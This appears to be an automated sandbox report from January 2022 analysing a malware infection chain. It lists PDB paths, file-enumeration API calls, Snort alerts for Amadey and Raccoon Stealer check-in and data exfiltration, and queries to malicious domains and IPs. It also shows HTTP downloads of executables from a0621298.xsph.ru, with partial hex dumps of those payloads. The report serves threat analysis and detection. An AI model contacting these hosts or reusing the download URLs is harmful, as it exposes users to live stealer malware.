Source:	Binary string: profapi.pdb, source: WerFault.exe, 0000001B.00000003.381546423.0000000005806000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 0000001B.00000003.381484904.00000000056A1000.00000004.00000001.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 0000001B.00000003.381484904.00000000056A1000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 0000001B.00000003.381514113.0000000005800000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: WerFault.exe, 0000001B.00000003.370128323.00000000035CF000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.381484904.00000000056A1000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.371827770.00000000035CF000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdbk source: WerFault.exe, 0000001B.00000003.381514113.0000000005800000.00000004.00000040.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 0000001B.00000003.381546423.0000000005806000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 0000001B.00000003.381546423.0000000005806000.00000004.00000040.sdmp
Source:	Binary string: C:\xobar.pdb source: emPJndhuvA.exe, 00000000.00000000.240583523.0000000000413000.00000002.00020000.sdmp, emPJndhuvA.exe, 00000000.00000002.249053095.0000000000413000.00000002.00020000.sdmp, tiftjuh, 00000014.00000002.348231795.0000000000413000.00000002.00020000.sdmp, tiftjuh, 00000014.00000000.339134972.0000000000413000.00000002.00020000.sdmp
Source:	Binary string: wsspicli.pdbk source: WerFault.exe, 0000001B.00000003.381514113.0000000005800000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 0000001B.00000003.381484904.00000000056A1000.00000004.00000001.sdmp
Source:	Binary string: !C:\tececa\sidexivuheje-vewa\xilo.pdb source: FD2B.exe, 0000001D.00000000.369230525.0000000000413000.00000002.00020000.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 0000001B.00000003.381546423.0000000005806000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 0000001B.00000003.381484904.00000000056A1000.00000004.00000001.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 0000001B.00000003.381514113.0000000005800000.00000004.00000040.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 0000001B.00000003.381546423.0000000005806000.00000004.00000040.sdmp
Source:	Binary string: C:\xanofa_towefogeximazu14\pexezi.pdb source: 952.exe, 0000001E.00000000.377588142.0000000000413000.00000002.00020000.sdmp, 952.exe, 0000001E.00000002.411047580.0000000000415000.00000002.00020000.sdmp, 952.exe, 0000001E.00000002.412892690.000000000078E000.00000004.00000020.sdmp, vodibdaj.exe, 0000002C.00000002.417553975.0000000000415000.00000002.00020000.sdmp, vodibdaj.exe, 0000002C.00000000.410165613.0000000000413000.00000002.00020000.sdmp
Source:	Binary string: msvcr100.i386.pdb source: WerFault.exe, 0000001B.00000003.381514113.0000000005800000.00000004.00000040.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000001B.00000003.381546423.0000000005806000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 0000001B.00000003.381484904.00000000056A1000.00000004.00000001.sdmp
Source:	Binary string: YD_C:\xanofa_towefogeximazu14\pexezi.pdb source: 952.exe, 0000001E.00000000.377588142.0000000000413000.00000002.00020000.sdmp, 952.exe, 0000001E.00000002.411047580.0000000000415000.00000002.00020000.sdmp, 952.exe, 0000001E.00000002.412892690.000000000078E000.00000004.00000020.sdmp, vodibdaj.exe, 0000002C.00000002.417553975.0000000000415000.00000002.00020000.sdmp, vodibdaj.exe, 0000002C.00000000.410165613.0000000000413000.00000002.00020000.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 0000001B.00000003.381514113.0000000005800000.00000004.00000040.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 0000001B.00000003.381514113.0000000005800000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdbk source: WerFault.exe, 0000001B.00000003.381514113.0000000005800000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 0000001B.00000003.381484904.00000000056A1000.00000004.00000001.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000001B.00000003.381514113.0000000005800000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 0000001B.00000003.381546423.0000000005806000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 0000001B.00000003.381546423.0000000005806000.00000004.00000040.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 0000001B.00000003.381514113.0000000005800000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 0000001B.00000003.381546423.0000000005806000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 0000001B.00000003.381484904.00000000056A1000.00000004.00000001.sdmp
Source:	Binary string: C:\vuravetabig\lohatevexap\pulirip.pdb source: 3D67.exe, 00000019.00000000.361126589.0000000000413000.00000002.00020000.sdmp, 3D67.exe, 00000019.00000002.372987587.0000000000413000.00000002.00020000.sdmp
Source:	Binary string: wkernel32.pdb( source: WerFault.exe, 0000001B.00000003.370138407.00000000035D5000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.370897133.00000000035D5000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.369939315.00000000035D5000.00000004.00000001.sdmp
Source:	Binary string: ^$C:\vuravetabig\lohatevexap\pulirip.pdb source: 3D67.exe, 00000019.00000000.361126589.0000000000413000.00000002.00020000.sdmp, 3D67.exe, 00000019.00000002.372987587.0000000000413000.00000002.00020000.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 0000001B.00000003.381484904.00000000056A1000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 0000001B.00000003.381484904.00000000056A1000.00000004.00000001.sdmp
Source:	Binary string: <wJC:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 2819.exe, 00000016.00000000.348562532.0000000000413000.00000002.00020000.sdmp, 2819.exe, 00000016.00000000.361993606.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 0000001B.00000002.426093244.0000000005790000.00000002.00020000.sdmp
Source:	Binary string: wntdll.pdb( source: WerFault.exe, 0000001B.00000003.370128323.00000000035CF000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.371827770.00000000035CF000.00000004.00000001.sdmp

Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	Code function: 29_2_00405E40 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	Code function: 29_2_004096E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	Code function: 29_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	Code function: 29_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	Code function: 29_2_00409B40 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	Code function: 29_2_00409970 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	Code function: 29_2_004087E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	Code function: 29_2_00588A30 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	Code function: 29_2_005814D0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	Code function: 29_2_005812E0 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	Code function: 29_2_00586090 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	Code function: 29_2_00589930 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	Code function: 29_2_00589BC0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	Code function: 29_2_00589D90 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2018581 ET TROJAN Single char EXE direct download likely trojan (multiple families) 192.168.2.5:49816 -> 141.8.194.74:80
Source: Traffic	Snort IDS: 1087 WEB-MISC whisker tab splice attack 192.168.2.5:49819 -> 185.215.113.35:80
Source: Traffic	Snort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49818 -> 185.215.113.35:80
Source: Traffic	Snort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.2.5:49834 -> 185.163.204.24:80
Source: Traffic	Snort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.2.5:49869 -> 185.163.204.24:80
Source: Traffic	Snort IDS: 2033974 ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt 192.168.2.5:49869 -> 185.163.204.24:80
Source: Traffic	Snort IDS: 2033974 ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt 192.168.2.5:49834 -> 185.163.204.24:80

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\svchost.exe	Domain query: patmushta.info
Source: C:\Windows\explorer.exe	Domain query: cdn.discordapp.com
Source: C:\Windows\explorer.exe	Network Connect: 188.166.28.199 80
Source: C:\Windows\explorer.exe	Domain query: unicupload.top
Source: C:\Windows\explorer.exe	Network Connect: 185.233.81.115 187
Source: C:\Windows\explorer.exe	Network Connect: 185.7.214.171 144
Source: C:\Windows\explorer.exe	Domain query: host-data-coin-11.com
Source: C:\Windows\explorer.exe	Domain query: privacy-tools-for-you-780.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: microsoft-com.mail.protection.outlook.com
Source: C:\Windows\explorer.exe	Domain query: goo.su
Source: C:\Windows\explorer.exe	Domain query: transfer.sh
Source: C:\Windows\explorer.exe	Domain query: a0621298.xsph.ru
Source: C:\Windows\explorer.exe	Network Connect: 185.186.142.166 80
Source: C:\Windows\explorer.exe	Domain query: data-host-coin-8.com

Source: global traffic	HTTP traffic detected: GET /KX6KAZ9Tip.exe HTTP/1.1Host: a0621298.xsph.ruAccept: /
Source: global traffic	HTTP traffic detected: GET /RMR.exe HTTP/1.1Host: a0621298.xsph.ruAccept: /
Source: global traffic	HTTP traffic detected: GET /123.exe HTTP/1.1Host: a0621298.xsph.ruAccept: /
Source: global traffic	HTTP traffic detected: GET /c_setup.exe HTTP/1.1Host: a0621298.xsph.ruAccept: /
Source: global traffic	HTTP traffic detected: GET /442.exe HTTP/1.1Host: a0621298.xsph.ruAccept: /
Source: global traffic	HTTP traffic detected: GET /443.exe HTTP/1.1Host: a0621298.xsph.ruAccept: /

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Thu, 13 Jan 2022 19:50:19 GMTContent-Type: application/x-msdos-programContent-Length: 301056Connection: closeLast-Modified: Mon, 10 Jan 2022 12:06:49 GMTETag: "49800-5d5392be00934"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 32 74 07 b2 76 15 69 e1 76 15 69 e1 76 15 69 e1 68 47 fc e1 69 15 69 e1 68 47 ea e1 fc 15 69 e1 68 47 ed e1 5b 15 69 e1 51 d3 12 e1 71 15 69 e1 76 15 68 e1 f9 15 69 e1 68 47 e3 e1 77 15 69 e1 68 47 fd e1 77 15 69 e1 68 47 f8 e1 77 15 69 e1 52 69 63 68 76 15 69 e1 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 d4 e8 62 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 1e 01 00 00 f6 03 00 00 00 00 00 9f 2d 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 20 05 00 00 04 00 00 a7 ea 04 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b0 65 01 00 50 00 00 00 00 00 04 00 b0 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 32 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 59 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c5 1d 01 00 00 10 00 00 00 1e 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 44 3f 00 00 00 30 01 00 00 40 00 00 00 22 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 58 84 02 00 00 70 01 00 00 24 02 00 00 62 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 10 01 00 00 00 04 00 00 12 01 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Thu, 13 Jan 2022 19:50:24 GMTContent-Type: application/x-msdos-programContent-Length: 294400Connection: closeLast-Modified: Thu, 13 Jan 2022 19:50:02 GMTETag: "47e00-5d57bfdfbe27b"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 25 6c 2c 3f 61 0d 42 6c 61 0d 42 6c 61 0d 42 6c 7f 5f d7 6c 7c 0d 42 6c 7f 5f c1 6c e2 0d 42 6c 7f 5f c6 6c 4f 0d 42 6c 46 cb 39 6c 62 0d 42 6c 61 0d 43 6c eb 0d 42 6c 7f 5f c8 6c 60 0d 42 6c 7f 5f d6 6c 60 0d 42 6c 7f 5f d3 6c 60 0d 42 6c 52 69 63 68 61 0d 42 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 c8 b4 05 60 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 20 01 00 00 da 03 00 00 00 00 00 b0 32 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 00 05 00 00 04 00 00 15 b0 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a8 7f 01 00 28 00 00 00 00 20 04 00 88 dc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 31 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 72 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 8c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 13 1f 01 00 00 10 00 00 00 20 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 88 58 00 00 00 30 01 00 00 5a 00 00 00 24 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 82 02 00 00 90 01 00 00 22 02 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 88 dc 00 00 00 20 04 00 00 de 00 00 00 a0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Thu, 13 Jan 2022 19:50:28 GMTContent-Type: application/x-msdos-programContent-Length: 327168Connection: closeLast-Modified: Thu, 13 Jan 2022 19:50:02 GMTETag: "4fe00-5d57bfdfbc33b"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 25 6c 2c 3f 61 0d 42 6c 61 0d 42 6c 61 0d 42 6c 7f 5f d7 6c 7c 0d 42 6c 7f 5f c1 6c e2 0d 42 6c 7f 5f c6 6c 4f 0d 42 6c 46 cb 39 6c 62 0d 42 6c 61 0d 43 6c eb 0d 42 6c 7f 5f c8 6c 60 0d 42 6c 7f 5f d6 6c 60 0d 42 6c 7f 5f d3 6c 60 0d 42 6c 52 69 63 68 61 0d 42 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 ca 8a b6 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 20 01 00 00 5a 04 00 00 00 00 00 b0 32 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 80 05 00 00 04 00 00 69 d6 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 7f 01 00 28 00 00 00 00 a0 04 00 88 dc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 31 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 72 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 8c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 13 1f 01 00 00 10 00 00 00 20 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 78 58 00 00 00 30 01 00 00 5a 00 00 00 24 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 78 02 03 00 00 90 01 00 00 a2 02 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 88 dc 00 00 00 a0 04 00 00 de 00 00 00 20 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Thu, 13 Jan 2022 19:51:04 GMTContent-Type: application/x-msdos-programContent-Length: 905216Connection: closeLast-Modified: Thu, 13 Jan 2022 15:53:07 GMTETag: "dd000-5d578aeb4049d"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8b cf 9c fb cf ae f2 a8 cf ae f2 a8 cf ae f2 a8 d1 fc 67 a8 d3 ae f2 a8 d1 fc 71 a8 49 ae f2 a8 d1 fc 76 a8 e1 ae f2 a8 e8 68 89 a8 cc ae f2 a8 cf ae f3 a8 45 ae f2 a8 d1 fc 78 a8 ce ae f2 a8 d1 fc 66 a8 ce ae f2 a8 d1 fc 63 a8 ce ae f2 a8 52 69 63 68 cf ae f2 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 cf 5b b6 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 20 01 00 00 32 0d 00 00 00 00 00 00 30 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 50 7c 02 00 04 00 00 e4 71 0e 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 66 01 00 28 00 00 00 00 70 0d 00 20 cd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 31 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 59 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 88 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 13 1e 01 00 00 10 00 00 00 20 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 22 3f 00 00 00 30 01 00 00 40 00 00 00 24 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 fe 0b 00 00 70 01 00 00 9e 0b 00 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 20 dd 6e 02 00 70 0d 00 00 ce 00 00 00 02 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 